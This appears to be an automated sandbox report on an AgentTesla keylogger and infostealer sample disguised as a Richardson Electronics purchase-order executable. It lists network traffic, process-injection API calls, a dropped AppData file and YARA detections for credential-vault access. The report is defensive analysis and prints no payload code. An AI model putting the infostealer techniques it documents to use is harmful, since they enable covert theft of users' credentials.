                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49710 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.6:49724 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                        System Summary

                        barindex
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BDAD0 NtProtectVirtualMemory,0_2_060BDAD0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BF004 NtResumeThread,0_2_060BF004
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BDAC8 NtProtectVirtualMemory,0_2_060BDAC8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BEFF8 NtResumeThread,0_2_060BEFF8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BF014 NtResumeThread,0_2_060BF014
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3F000 NtResumeThread,3_2_05A3F000
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3DAD0 NtProtectVirtualMemory,3_2_05A3DAD0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3EFF8 NtResumeThread,3_2_05A3EFF8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3DAC8 NtProtectVirtualMemory,3_2_05A3DAC8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2F000 NtResumeThread,8_2_05B2F000
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2DAD0 NtProtectVirtualMemory,8_2_05B2DAD0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2EFF8 NtResumeThread,8_2_05B2EFF8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2DAC8 NtProtectVirtualMemory,8_2_05B2DAC8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_012CAA280_2_012CAA28
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_012C67C90_2_012C67C9
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_012C67D80_2_012C67D8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_012C72680_2_012C7268
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_012C72780_2_012C7278
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060617A00_2_060617A0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_06061AD70_2_06061AD7
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060629B80_2_060629B8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B1A780_2_060B1A78
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B6F000_2_060B6F00
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BAD680_2_060BAD68
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B6EF20_2_060B6EF2
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B84A80_2_060B84A8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060B84A60_2_060B84A6
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060BAD660_2_060BAD66
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D35A10_2_060D35A1
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DE7740_2_060DE774
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D1D0B0_2_060D1D0B
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D15000_2_060D1500
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D7A1B0_2_060D7A1B
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D7A280_2_060D7A28
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D1B280_2_060D1B28
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D1B380_2_060D1B38
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DE3910_2_060DE391
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DE3A00_2_060DE3A0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060D308D0_2_060D308D
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DE9280_2_060DE928
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060DE9380_2_060DE938
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F5B780_2_060F5B78
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F689B0_2_060F689B
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060FF6E80_2_060FF6E8
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F5B690_2_060F5B69
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F53B10_2_060F53B1
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F53C00_2_060F53C0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F5C6C0_2_060F5C6C
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060FB8BE0_2_060FB8BE
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_060F6DFF0_2_060F6DFF
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_062AEE500_2_062AEE50
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_062A00060_2_062A0006
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_062A00400_2_062A0040
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_0652D2D00_2_0652D2D0
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_0652CF200_2_0652CF20
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_065100400_2_06510040
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeCode function: 0_2_065100060_2_06510006
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E24A602_2_00E24A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E29C632_2_00E29C63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E23E482_2_00E23E48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E2CF282_2_00E2CF28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00E241902_2_00E24190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_061356B02_2_061356B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_061300402_2_06130040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06133F282_2_06133F28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0613BCC82_2_0613BCC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06132AE82_2_06132AE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06138B5B2_2_06138B5B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0613DBF82_2_0613DBF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0613321B2_2_0613321B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06134FD02_2_06134FD0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_0233AA283_2_0233AA28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_023367D83_2_023367D8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_023367C93_2_023367C9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_02336FD43_2_02336FD4
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_023372783_2_02337278
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059E4DB03_2_059E4DB0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059E17A03_2_059E17A0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059E29B83_2_059E29B8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_059E1AD73_2_059E1AD7
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A319903_2_05A31990
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3AD683_2_05A3AD68
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A36F003_2_05A36F00
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A3AD593_2_05A3AD59
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A384A83_2_05A384A8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A384993_2_05A38499
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A36EF13_2_05A36EF1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A535A13_2_05A535A1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5D5C93_2_05A5D5C9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5D5D83_2_05A5D5D8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A51D0B3_2_05A51D0B
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5D9BC3_2_05A5D9BC
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5308D3_2_05A5308D
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5DB803_2_05A5DB80
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A51B283_2_05A51B28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A51B383_2_05A51B38
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A5DB703_2_05A5DB70
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A7689A3_2_05A7689A
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A75B783_2_05A75B78
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A76DFF3_2_05A76DFF
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A7B8BE3_2_05A7B8BE
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A75C6C3_2_05A75C6C
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A753B13_2_05A753B1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A753C03_2_05A753C0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A75B693_2_05A75B69
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05A7F6E83_2_05A7F6E8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05C200403_2_05C20040
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05C200213_2_05C20021
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05C2EE503_2_05C2EE50
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05E900403_2_05E90040
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05E9001F3_2_05E9001F
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05EACF203_2_05EACF20
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 3_2_05EAD2D03_2_05EAD2D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0541BCC05_2_0541BCC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05418B525_2_05418B52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0541DBF05_2_0541DBF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0541361B5_2_0541361B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_054156A85_2_054156A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_054100405_2_05410040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05413F205_2_05413F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05414FC85_2_05414FC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05412EE85_2_05412EE8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_00A7AA288_2_00A7AA28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_00A767C98_2_00A767C9
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_00A767D88_2_00A767D8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_00A76FD48_2_00A76FD4
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_00A772788_2_00A77278
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05AD4DB08_2_05AD4DB0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05AD17A08_2_05AD17A0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05AD29B88_2_05AD29B8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05AD1AD78_2_05AD1AD7
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2AD688_2_05B2AD68
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B21B888_2_05B21B88
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B26F008_2_05B26F00
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B2AD598_2_05B2AD59
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B284A68_2_05B284A6
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B284A88_2_05B284A8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B26EF28_2_05B26EF2
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B435A18_2_05B435A1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4D5808_2_05B4D580
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B41D0B8_2_05B41D0B
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4D5718_2_05B4D571
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4D9648_2_05B4D964
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4308D8_2_05B4308D
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B41B388_2_05B41B38
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4DB288_2_05B4DB28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B41B288_2_05B41B28
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B4DB188_2_05B4DB18
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B6689A8_2_05B6689A
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B65B788_2_05B65B78
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B66DFF8_2_05B66DFF
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B65C6C8_2_05B65C6C
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B653B18_2_05B653B1
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B653C08_2_05B653C0
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B65B698_2_05B65B69
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05B6F6E88_2_05B6F6E8
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05D100408_2_05D10040
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05D100078_2_05D10007
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05D1EE508_2_05D1EE50
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05F800408_2_05F80040
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05F800068_2_05F80006
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05F9CF208_2_05F9CF20
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeCode function: 8_2_05F9D2D08_2_05F9D2D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E993F89_2_02E993F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E941909_2_02E94190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E94A609_2_02E94A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E93E489_2_02E93E48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E9CF289_2_02E9CF28
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E99C709_2_02E99C70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB8D2D9_2_05AB8D2D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05ABBCC09_2_05ABBCC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05ABDC009_2_05ABDC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB56A89_2_05AB56A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB36309_2_05AB3630
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB00409_2_05AB0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB4FC89_2_05AB4FC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB3F209_2_05AB3F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_05AB2EE89_2_05AB2EE8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 9_2_02E99C689_2_02E99C68
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2200865737.0000000005F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTshrdofbi.dll" vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTshrdofbi.dll" vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003D99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTshrdofbi.dll" vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000000.2139191255.0000000000994000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVsjieqtu.exe2 vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.000000000303D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVsjieqtu.exe2 vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202771883.00000000062B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2176292945.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeBinary or memory string: OriginalFilenameVsjieqtu.exe2 vs Richardson Electronics, LTD. PRD10221301UUE.exe
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
